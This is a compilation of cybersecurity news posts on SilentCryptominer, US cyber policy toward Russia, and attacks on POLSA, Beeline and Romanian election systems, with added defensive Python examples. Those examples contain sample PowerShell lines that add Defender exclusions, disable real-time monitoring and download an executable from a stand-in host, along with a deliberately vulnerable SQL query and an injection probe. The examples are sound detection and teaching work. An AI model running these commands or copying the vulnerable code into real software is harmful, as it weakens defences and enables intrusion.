
SilentCryptominer Threatens YouTubers to Post Malware in Videos

Experts have discovered an advanced malware campaign that exploits the rising popularity of Windows Packet Divert drivers, which are widely used as a way to bypass internet restrictions.

Malware targets YouTubers 

Hackers are spreading SilentCryptominer malware disguised as genuine software. It has infected over 2,000 victims in Russia alone. The attack vector involves tricking YouTubers with large follower bases into spreading malicious links.

“Such software is often distributed in the form of archives with text installation instructions, in which the developers recommend disabling security solutions, citing false positives,” reports Secure List. This helps threat actors by “allowing them to persist in an unprotected system without the risk of detection.”

Innocent YouTubers Turned into victims

“Most active of all have been schemes for distributing popular stealers, remote access tools (RATs), Trojans that provide hidden remote access, and miners that harness computing power to mine cryptocurrency,” the report continues. Malware commonly seen in this distribution scheme includes Phemedrone, DCRat, NJRat, and XWorm.

In one incident, a YouTuber with 60k subscribers posted videos containing malicious links to infected archives, gaining over 400k views. The malicious files were hosted on gitrok[.]com, where the download counter exceeded 40,000.

Blackmail and distributing malware

Threat actors have started using a new distribution scheme in which they send copyright strikes to content creators and influencers and threaten to have their channels shut down unless they post videos containing malicious links. This scare tactic abuses the reach of popular YouTubers to distribute malware to a larger audience.

The infection chain starts with a modified start script that launches an additional executable via PowerShell.

As per the Secure List report, the loader (written in Python) is packaged with PyInstaller and fetches the next-stage payload from hardcoded domains. The second-stage loader runs environment checks, adds the “AppData directory to Microsoft Defender exclusions”, and downloads the final payload, “SilentCryptominer.”
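The detection side of the chain just described, as an added example that is not part of the original post or the Secure List report: a small Python triage routine over constructed PowerShell process-creation records. It flags an Add-MpPreference exclusion, a Set-MpPreference call that disables real-time monitoring, and escalates a download whose destination lies under a directory the same user excluded moments earlier, which is the sequence the post attributes to the second-stage loader. The log format, user names and URLs are invented for the example.

```python
import re
from typing import Dict, List

# Constructed sample process-creation records (not from the Secure List report):
# "timestamp|user|image|command line", one event per line.
SAMPLE_LOG = """\
2025-03-01T10:02:11Z|alice|powershell.exe|powershell -nop -w hidden -c "Add-MpPreference -ExclusionPath $env:APPDATA"
2025-03-01T10:02:13Z|alice|powershell.exe|powershell -c "Invoke-WebRequest -Uri https://stage2.example.invalid/upd.exe -OutFile $env:APPDATA\\upd.exe"
2025-03-01T10:05:40Z|svc_backup|powershell.exe|powershell -File C:\\Scripts\\backup.ps1
2025-03-01T10:06:02Z|bob|powershell.exe|powershell -c "Set-MpPreference -DisableRealtimeMonitoring $true"
"""

# Command-line patterns worth an alert. The chain described in the post first adds
# the AppData directory to Defender's exclusions, then fetches the next stage into it.
EXCLUSION_RE = re.compile(
    r"Add-MpPreference\s+.*?-Exclusion(?:Path|Process|Extension)\s+(\S+)", re.I)
DISABLE_RT_RE = re.compile(
    r"Set-MpPreference\s+.*?-DisableRealtimeMonitoring\s+\$true", re.I)
DOWNLOAD_RE = re.compile(
    r"(?:Invoke-WebRequest|iwr|Start-BitsTransfer)\b.*?-(?:OutFile|Destination)\s+(\S+)", re.I)


def _clean(token: str) -> str:
    """Strip quoting so '$env:APPDATA"' and '$env:APPDATA' compare equal."""
    return token.strip("\"'").lower()


def triage(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per suspicious command line, in log order.

    Exclusion additions are remembered per user so that a later download into a
    path under a freshly excluded directory is escalated to high severity.
    """
    excluded_by_user: Dict[str, List[str]] = {}
    findings: List[Dict[str, str]] = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ts, user, image, cmdline = raw.split("|", 3)
        if image.lower() != "powershell.exe":
            continue

        m = EXCLUSION_RE.search(cmdline)
        if m:
            path = _clean(m.group(1))
            excluded_by_user.setdefault(user, []).append(path)
            findings.append({"ts": ts, "user": user, "rule": "defender-exclusion-added",
                             "severity": "medium", "detail": path})
            continue

        if DISABLE_RT_RE.search(cmdline):
            findings.append({"ts": ts, "user": user, "rule": "defender-realtime-disabled",
                             "severity": "high", "detail": cmdline})
            continue

        m = DOWNLOAD_RE.search(cmdline)
        if m:
            dest = _clean(m.group(1))
            hits = [p for p in excluded_by_user.get(user, []) if dest.startswith(p)]
            if hits:
                findings.append({"ts": ts, "user": user, "rule": "download-into-excluded-path",
                                 "severity": "high", "detail": f"{dest} under exclusion {hits[0]}"})
            else:
                findings.append({"ts": ts, "user": user, "rule": "powershell-download",
                                 "severity": "low", "detail": dest})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"{f['ts']} {f['severity']:6} {f['user']:10} {f['rule']}: {f['detail']}")
```

The per-user exclusion memory is the point: an exclusion on its own is noisy in many environments, but a download landing in a path that the same account excluded seconds earlier is the behaviour the post describes and deserves a higher severity than either event alone.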

The infamous SilentCryptoMiner

SilentCryptoMiner is known for mining multiple cryptocurrencies via different algorithms. It uses process hollowing to inject the miner code into legitimate processes for stealth.

The malware can evade security checks, for example by pausing mining while certain processes are running and by scanning for virtual-environment indicators.

U.S. Pauses Offensive Cyberoperations Against Russia Amid Security Concerns

 

Defense Secretary Pete Hegseth has paused offensive cyberoperations against Russia by U.S. Cyber Command, rolling back some efforts to contend with a key adversary even as national security experts call for the U.S. to expand those capabilities. A U.S. official, speaking on condition of anonymity to discuss sensitive operations, on Monday confirmed the pause. 

Hegseth’s decision does not affect cyberoperations conducted by other agencies, including the CIA and the Cybersecurity and Infrastructure Security Agency. But the Trump administration also has rolled back other efforts at the FBI and other agencies related to countering digital and cyber threats. The Pentagon decision, which was first reported by The Record, comes as many national security and cybersecurity experts have urged greater investments in cyber defense and offense, particularly as China and Russia have sought to interfere with the nation’s economy, elections and security. 

Republican lawmakers and national security experts have all called for a greater offensive posture. During his Senate confirmation hearing this year, CIA Director John Ratcliffe said America’s rivals have shown that they believe cyberespionage — retrieving sensitive information and disrupting American business and infrastructure — to be an essential weapon of the modern arsenal. “I want us to have all of the tools necessary to go on offense against our adversaries in the cyber community,” Ratcliffe said. Cyber Command oversees and coordinates the Pentagon’s cybersecurity work and is known as America’s first line of defense in cyberspace. It also plans offensive cyberoperations for potential use against adversaries. 

Hegseth’s directive arrived before Friday’s dustup between President Donald Trump and Ukrainian President Volodymyr Zelenskyy in the Oval Office. It wasn’t clear if the pause was tied to any negotiating tactic by the Trump administration to push Moscow into a peace deal with Ukraine. Trump has vowed to end the war that began when Russia invaded Ukraine three years ago, and on Monday he slammed Zelenskyy for suggesting the end to the conflict was “far away.” 

The White House did not immediately respond to questions about Hegseth's order. Cyber warfare is cheaper than traditional military force, can be carried out covertly and doesn’t carry the same risk of escalation or retaliation, making it an increasingly popular tool for nations that want to contend with the U.S. but lack the traditional economic or military might, according to Snehal Antani, CEO of Horizon3.ai, a San Francisco-based cybersecurity firm founded by former national security officers. Cyberespionage can allow adversaries to steal competitive secrets from American companies, obtain sensitive intelligence or disrupt supply chains or the systems that manage dams, water plants, traffic systems, private companies, governments and hospitals. The internet has created new battlefields, too, as nations like Russia and China use disinformation and propaganda to undermine their opponents. 

Artificial intelligence now makes it easier and cheaper than ever for anyone — be it a foreign nation like Russia, China or North Korea or criminal networks — to step up their cybergame at scale, Antani said. Fixing code, translating disinformation or identifying network vulnerabilities once required a human — now AI can do much of it faster. “We are entering this era of cyber-enabled economic warfare that is at the nation-state level,” Antani said. “We’re in this really challenging era where offense is significantly better than defense, and it’s going to take a while for defense to catch up.” Meanwhile, Attorney General Pam Bondi also has disbanded an FBI task force focused on foreign influence campaigns, like those Russia used to target U.S. elections in the past. And more than a dozen people who worked on election security at the Cybersecurity and Infrastructure Security Agency were put on leave. 

These actions are leaving the U.S. vulnerable despite years of evidence that Russia is committed to continuing and expanding its cyber efforts, according to Liana Keesing, campaigns manager for technology reform at Issue One, a nonprofit that has studied technology’s impact on democracy. “Instead of confronting this threat, the Trump administration has actively taken steps to make it easier for the Kremlin to interfere in our electoral processes,” Keesing said.

Trump Administration Halts Offensive Cyber Operations Against Russia Amid Ukraine War Talks

 

The Trump administration has issued orders to suspend U.S. offensive cyber operations targeting Russia, a move reportedly aimed at encouraging Russian President Vladimir Putin to engage in diplomatic discussions over the war in Ukraine. According to The Record, U.S. Defense Secretary Pete Hegseth directed the halt, which is expected to remain in place indefinitely. 

This decision comes in the wake of a heated Oval Office dispute on Friday between President Donald Trump, Vice President JD Vance, and Ukrainian President Volodymyr Zelensky over continued U.S. financial and military support for Ukraine. The previous Biden administration had strongly backed Ukraine, committing billions of dollars in aid and weaponry to counter Russian aggression. 

However, the Trump administration’s shift in stance has raised uncertainty regarding America’s future role in the conflict. Meanwhile, British Prime Minister Keir Starmer announced on Sunday that European nations would establish a “coalition of the willing” to continue providing support to Ukraine. 

The extent of the U.S. cyber operations suspension remains unclear, but officials stress that understanding Russia’s objectives in Ukraine is crucial for assessing Moscow’s broader geopolitical strategy, particularly in the realm of cyber espionage. 

Hegseth’s directive is reportedly part of a larger reassessment of Washington’s involvement in the war and its broader operations against Russia. While intelligence-gathering activities remain unaffected, the decision to halt offensive cyber operations is seen as a calculated risk. Trump has previously blamed Ukraine for the war and has labeled Zelensky a “dictator” who, in his view, is “not ready for peace.”

Poland’s Space Agency Investigates Cyberattack, Works On Security Measures

 



Poland’s space agency, POLSA, has reported a cyberattack on its systems, prompting an ongoing investigation. In response to the breach, the agency quickly disconnected its network from the internet to prevent further damage. As of Monday, its official website was still offline.  


Government and Cybersecurity Teams Take Action

Poland’s Minister of Digital Affairs, Krzysztof Gawkowski, confirmed that cybersecurity experts detected unauthorized access to POLSA’s systems. Security specialists have since secured the affected infrastructure and are now working to determine who was behind the attack. However, officials have not yet shared whether the hackers were financially motivated cybercriminals or politically driven groups. The method used to infiltrate the agency’s network also remains undisclosed.  


Why Hackers Target Space Agencies

Organizations involved in space research and technology are often appealing targets for cybercriminals. Many of these agencies collaborate with defense and intelligence sectors, making them vulnerable to attacks that could expose confidential projects, satellite communications, and security-related data. A cyberattack on such an agency could disrupt critical operations, leak classified research, or even interfere with national security.  


Poland Faces a Surge in Cyberattacks

Poland has become one of the most frequently targeted countries in the European Union when it comes to cyber threats. Earlier this year, Gawkowski stated that the country experiences more cyber incidents than any other EU nation, with most attacks believed to be linked to Russian actors. Poland’s strong support for Ukraine, both in military assistance and humanitarian aid, has likely contributed to this rise in cyber threats.  

The number of cyberattacks against Poland has increased drastically in recent years. Reports indicate that attacks doubled in 2023 compared to previous years, with over 400,000 cybersecurity incidents recorded in just the first half of the year. In response, the Polish government introduced a cybersecurity initiative in June, allocating $760 million to strengthen the country’s digital defenses.  


Other Space Agencies Have Also Been Targeted

This is not the first time a space agency has fallen victim to cyberattacks. Japan’s space agency, JAXA, has faced multiple breaches in the past. In 2016, reports suggested that JAXA was among 200 Japanese organizations targeted by suspected Chinese military hackers. In 2023, unknown attackers infiltrated the agency’s network, raising concerns that sensitive communications with private companies, such as Toyota, may have been exposed.  

As space technology continues to advance, protecting space agencies from cyber threats has become more crucial than ever. These organizations handle valuable and often classified information, making them prime targets for espionage, sabotage, and financial cybercrime. If hackers manage to breach their systems, the consequences could be severe, ranging from stolen research data to disruptions in satellite operations and defense communications.  

POLSA’s ongoing investigation will likely uncover more details about the cyberattack in the coming weeks. For now, the incident highlights the increasing need for governments and space organizations to invest in stronger cybersecurity measures to protect critical infrastructure.

Russian Telecom Company "Beeline" Hit, Users Face Internet Outage

Internet outage in Russia, telecom provider attacked

Users in Russia faced an internet outage after a targeted DDoS attack on Russian telecom company Beeline. This is the second major attack in recent weeks on the Moscow-based provider, which has over 44 million subscribers.

After several user complaints and reports from outage-tracking services, Beeline confirmed the attack to local media.

According to Record Media, internet monitoring service Downdetector’s data suggests “most Beeline users in Russia faced difficulties accessing the company’s mobile app, while some also reported website outages, notification failures and internet disruptions.” 

Impact on Beeline

Beeline announced the attack on its Telegram channel, stressing that the attackers did not gain unauthorized access to customer data. The provider is currently restoring all affected systems and tightening its cybersecurity policies to prevent future attacks. Mobile services are working, but users have reported problems with some online services and account management features.

Rise of threat in Russia

The targeted attack on Beeline is part of a wider trend of cyberattacks in Russia; in September 2024, VTB, Russia’s second-largest bank, faced similar issues due to an attack on its infrastructure. 

These attacks highlight the rising threat posed by cyberattacks that single out critical infrastructure in Russia and worldwide.

Experts have been warning about the rise in intensity and advanced techniques of such cyberattacks, damaging not only critical businesses but also essential industries that support millions of Russian citizens. 

Telecom companies in Russia targeted

How Beeline responds to the attack and recovers will be closely watched by both the telecom industry and regulators. The Beeline incident resembles the attack on Russian telecom giant Megafon, another large-scale DDoS attack that took place earlier this year.

According to a cybersecurity source cited by Forbes Russia, the Beeline attack in February and the Megafon incident in January are the top hacktivist cyberattacks targeting the telecom sector in 2025.

The source told Forbes, “Both attacks were multi-vector and large-scale. The volume of malicious traffic was identical, but MegaFon faced an attack from 3,300 IP addresses, while Beeline was targeted via 1,600, resulting in a higher load per IP address.”

Hackers Use Russian Domains for Phishing Attacks

The latest research has found a sharp rise in suspicious email activity and a change in attack tactics. If you communicate via email regularly, keep a lookout for malicious or unusual activity; it might be a scam. This post covers the latest attack tactics threat actors are using.

Malicious email escapes SEGs

At least one malicious email bypasses Secure Email Gateways (SEGs), such as Proofpoint and Microsoft, every 45 seconds, a significant rise from last year’s rate of one every 57 seconds, according to Cofense Intelligence’s third-quarter report.

A sudden increase in the use of remote access Trojans (RATs) is giving hackers unauthorized access to targets’ systems, which leads to further abuse, theft, and data exploitation.

Increase in Remote Access Trojan (RAT) use

Remcos RAT, a frequently used tool among hackers, is a key factor contributing to the surge in RAT attacks. It allows the attacker to remotely manipulate infected systems, exfiltrate data, deploy other malware, and obtain persistent access to vulnerable networks.

According to the data, the use of open redirects in phishing attempts has increased by 627%. These attacks use legitimate website functionality to redirect users to malicious URLs, frequently disguised as well-known and reputable domains.

Using TikTok and Google AMP

TikTok and Google AMP are frequently used to carry out these attacks, leveraging their worldwide reach and widespread use by unsuspecting users.

The use of malicious Office documents, particularly those in .docx format, increased by roughly 600%. These documents frequently include phishing links or QR codes that lead people to malicious websites.

Microsoft Office documents are an important attack vector due to their extensive use in commercial contexts, making them perfect for targeting enterprises via spear-phishing operations.

Furthermore, there has been a substantial shift in data exfiltration strategies, with a rise in the use of .ru and .su top-level domains (TLDs). Domains with the .ru (Russia) and .su (Soviet Union) extensions saw usage spikes of more than fourfold and twelvefold, respectively, indicating cybercriminals are turning to less common and geographically associated domains to evade detection and make it more difficult for victims and security teams to track data theft activities.
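As an added example (not from the Cofense report or the original post), the following Python routine triages the links in a constructed email body without touching the network: it unwraps two wrapper shapes the text mentions, a Google AMP cache path (google.com/amp/s/&lt;host&gt;/...) and an open-redirect style query parameter carrying an absolute URL, and flags any final destination on a .ru or .su TLD. The host names and the redirect endpoint are constructed; real open redirectors differ in their parameter names, so the query check is deliberately generic.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlparse

# Constructed sample email body (not from the Cofense report). The first two links
# hide their real destination behind a reputable host; the third is benign.
SAMPLE_EMAIL = """\
Hi team,
Please review the shared file: https://www.google.com/amp/s/files-portal.example.ru/login
Invoice: https://trusted.example.com/redirect?url=https%3A%2F%2Fpay-update.example.su%2Fconfirm
Meeting notes: https://intranet.example.com/docs/notes.docx
Thanks
"""

URL_RE = re.compile(r"https?://[^\s<>\"']+")
SUSPICIOUS_TLDS = {"ru", "su"}  # the TLDs the report singles out
MAX_HOPS = 3  # guard against wrapper links that point at each other


def embedded_target(url: str) -> Optional[str]:
    """Return the URL a wrapper link forwards to, or None if it is a plain link.

    Two wrapper shapes are recognised: the Google AMP cache path
    (google.com/amp/s/<host>/<path>) and any query parameter whose value is
    itself an absolute http(s) URL, the usual open-redirect shape.
    """
    p = urlparse(url)
    host = p.netloc.lower()
    if (host == "google.com" or host.endswith(".google.com")) and p.path.startswith("/amp/s/"):
        return "https://" + p.path[len("/amp/s/"):]
    for values in parse_qs(p.query).values():
        for v in values:
            if v.lower().startswith(("http://", "https://")):
                return v
    return None


def analyze_url(url: str) -> Dict[str, object]:
    """Follow wrapper links offline (no requests are made) and flag the final host."""
    hops = [url]
    while len(hops) <= MAX_HOPS:
        nxt = embedded_target(hops[-1])
        if nxt is None or nxt in hops:
            break
        hops.append(nxt)
    final_host = urlparse(hops[-1]).netloc.lower().split(":")[0]
    flags: List[str] = []
    if len(hops) > 1:
        flags.append("open-redirect-style")
    if final_host.rsplit(".", 1)[-1] in SUSPICIOUS_TLDS:
        flags.append("suspicious-tld")
    return {"url": url, "final_url": hops[-1], "final_host": final_host, "flags": flags}


def triage_email(body: str) -> List[Dict[str, object]]:
    """Extract every link in an email body and analyse it, in order of appearance."""
    return [analyze_url(m.group(0).rstrip(".,;)")) for m in URL_RE.finditer(body)]


if __name__ == "__main__":
    for r in triage_email(SAMPLE_EMAIL):
        print(r["final_host"], r["flags"] or "clean")
```

The value of unwrapping is that reputation checks run against the host a user will actually land on rather than the trusted host that fronts it; a link whose visible domain is reputable but whose embedded target sits on a .ru or .su domain is exactly the pattern the statistics above describe.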

Romania Annuls Elections After TikTok Campaign and Cyberattacks Linked to Russia

 


Romania’s Constitutional Court (CCR) has annulled the first round of its recent presidential elections after intelligence reports revealed extensive foreign interference. Cyberattacks and influence campaigns have raised serious concerns, prompting authorities to reschedule elections while addressing security vulnerabilities. 
  
Cyberattacks on Election Infrastructure

The Romanian Intelligence Service (SRI) uncovered relentless cyberattacks targeting key election systems between November 19th and November 25th. Attackers exploited vulnerabilities to compromise platforms such as:
  • Bec.ro: Central Election Bureau system.
  • Registrulelectoral.ro: Voter registration platform.
Key findings include:
  • Methods Used: SQL injection and cross-site scripting (XSS) exploited to infiltrate systems.
  • Leaked Credentials: Stolen login details shared on Russian cybercrime forums.
  • Server Breach: A compromised server linked to mapping data allowed access to sensitive election infrastructure.
  • Origin: Attacks traced to devices in over 33 countries, suggesting state-level backing.
While the SRI has not explicitly named Russia, the attack methods strongly indicate state-level involvement.

TikTok Influence Campaign

Beyond cyberattacks, a coordinated TikTok influence campaign sought to sway public opinion in favor of presidential candidate Calin Georgescu:
  • Influencers: Over 100 influencers with a combined 8 million followers participated.
  • Payments: Ranged from $100 for smaller influencers to substantial sums for those with larger followings.
  • Impact: Pro-Georgescu content peaked on November 26th, ranking 9th among TikTok’s top trending videos.
  • Activity Pattern: Many accounts involved were dormant since 2016 but became active weeks before the election.
Romania’s Ministry of Internal Affairs (MAI) noted parallels between Georgescu’s messaging and narratives supporting pro-Russian candidates in Moldova, further tying the campaign to Russian influence efforts.

Geopolitical Implications

Romania’s Foreign Intelligence Service (SIE) linked these actions to a broader Russian strategy to destabilize NATO-aligned countries:
  • Goals: Undermine democratic processes and promote eurosceptic narratives.
  • Target: Romania’s significant NATO presence makes it a critical focus of Russian propaganda and disinformation campaigns.

Election Annulment and Future Challenges

On November 6th, the CCR annulled the election’s first round, citing security breaches and highlighting vulnerabilities in Romania’s electoral infrastructure. Moving forward:
  • Cybersecurity Enhancements: Authorities face mounting pressure to strengthen defenses against similar attacks.
  • Disinformation Countermeasures: Efforts to combat influence campaigns are essential to safeguarding future elections.
  • Warning from SRI: Election system vulnerabilities remain exploitable, raising concerns about upcoming elections.
The incidents in Romania underscore the rising threat of cyberattacks and influence operations on democratic processes worldwide, emphasizing the urgent need for robust security measures to protect electoral integrity.

Romania's Election System Hit by Over 85,000 Cyberattacks, Russian Links Suspected


Romania’s intelligence service in its declassified report disclosed the country’s election systems were hit by over 85,000 cyberattacks. Attackers have also stolen login credentials for election-related sites and posted the information on a Russian hacker forum just before the first presidential election round. 

Data leaked on Russian site

The data was likely stolen by attacking legitimate users and exploiting legitimate training servers. Russia has denied any involvement in Romania’s election campaign.

The Romanian Intelligence Service (SRI) said, “The attacks continued intensively including on election day and the night after elections. The operating mode and the amplitude of the campaign lead us to conclude the attacker has considerable resources specific to an attacking state.”

About the attack

SRI says the IT infrastructure of Romania’s Permanent Electoral Authority (AEP) was targeted on 19th November. Threat actors disrupted a server containing mapping data (gis.registrulelectoral.ro) that was connected with the public web as well as AEP’s internal network.

After the attack, login details for Romanian election websites, bec.ro (Central Election Bureau), roaep.ro, and registrulelectoral.ro (voter registration), were posted on a Russian cybercrime platform.

Motives for the attack

SRI believes the 85,000 attacks lasted until November 25th; the motive was to gain access to election infrastructure and disrupt the systems in order to compromise the election information available to the public and restrict access to the systems. The declassified report mentions that the attacker attempted to compromise the systems by exploiting SQL injection and cross-site scripting (XSS) flaws from devices in 33 countries.

The Romanian agency has warned that the vulnerabilities still affect the election infrastructure and could be abused to move laterally within the network and establish a persistent presence.

Influence campaign on elections

SRI believes Russia orchestrated the attacks as a part of a larger plan to disrupt democratic elections in Eastern Europe. The agency says Moscow perceives Romania as an ‘enemy nation’ because the latter supports NATO and Ukraine. The influence campaign tactics include disinformation, propaganda, and supporting European agendas shaping public opinion. 

Romania’s Foreign Intelligence Service (SIE) believes Russia targeted the country as part of broader efforts to influence democratic elections in Eastern Europe. Moscow views Romania as an “enemy state” due to its support for NATO and Ukraine. These influence operations include propaganda, disinformation, and support for eurosceptic agendas, aiming to shape public opinion favoring Russia. 

While there is no concrete proof of Russia’s direct involvement in the Romanian elections, the declassified document points to Russia’s history of election meddling elsewhere.
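Both Romania posts above name SQL injection and cross-site scripting as the methods used against the election platforms. As an added example, not code from either post or from the systems involved, here is the vulnerable shape of each beside its hardened form in Python with sqlite3: string-built SQL against a bound parameter, and raw HTML reflection against html.escape, with an allow-list validator as a second layer. The precinct table, the code format (CODE_RE) and the function names are constructed for the illustration.

```python
import html
import re
import sqlite3
from typing import List, Tuple

# Constructed lookup table standing in for a polling-station search form; the codes
# and names are invented for the example.
PRECINCTS = [("B-001", "Bucharest, Sector 1"), ("CJ-014", "Cluj-Napoca, station 14")]
CODE_RE = re.compile(r"^[A-Z]{1,2}-\d{3}$")  # hypothetical precinct-code format


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE precincts (code TEXT PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO precincts VALUES (?, ?)", PRECINCTS)
    return conn


def find_precinct_unsafe(conn, code: str) -> List[Tuple[str, str]]:
    """Vulnerable: user input is pasted into the SQL text, so quote characters
    change the query's structure instead of being treated as data."""
    query = f"SELECT code, name FROM precincts WHERE code = '{code}'"
    return conn.execute(query).fetchall()


def find_precinct_safe(conn, code: str) -> List[Tuple[str, str]]:
    """Hardened: a bound parameter is always a value, never SQL syntax."""
    return conn.execute("SELECT code, name FROM precincts WHERE code = ?", (code,)).fetchall()


def validate_code(code: str) -> str:
    """Defence in depth: reject anything that is not a well-formed precinct code
    before it reaches the database at all."""
    if not CODE_RE.fullmatch(code):
        raise ValueError(f"malformed precinct code: {code!r}")
    return code


def render_unsafe(code: str, rows) -> str:
    """Vulnerable: reflecting raw input into HTML is the XSS shape."""
    return f"<p>{len(rows)} result(s) for {code}</p>"


def render_safe(code: str, rows) -> str:
    """Hardened: escape before interpolating into an HTML context."""
    return f"<p>{len(rows)} result(s) for {html.escape(code)}</p>"


def lookup(conn, code: str) -> str:
    """The hardened path end to end: validate, query with parameters, escape output."""
    rows = find_precinct_safe(conn, validate_code(code))
    return render_safe(code, rows)


if __name__ == "__main__":
    db = make_db()
    probe = "x' OR '1'='1"
    print("unsafe rows:", len(find_precinct_unsafe(db, probe)))  # every row leaks
    print("safe rows:  ", len(find_precinct_safe(db, probe)))    # nothing matches
    print(lookup(db, "B-001"))
```

The two hardened pieces are independent: parameter binding stops the database from interpreting input as SQL, and output escaping stops the browser from interpreting it as markup. The validator is not a substitute for either, but it shrinks the input space that ever reaches them, which is the layering a defender would want on a public-facing lookup form.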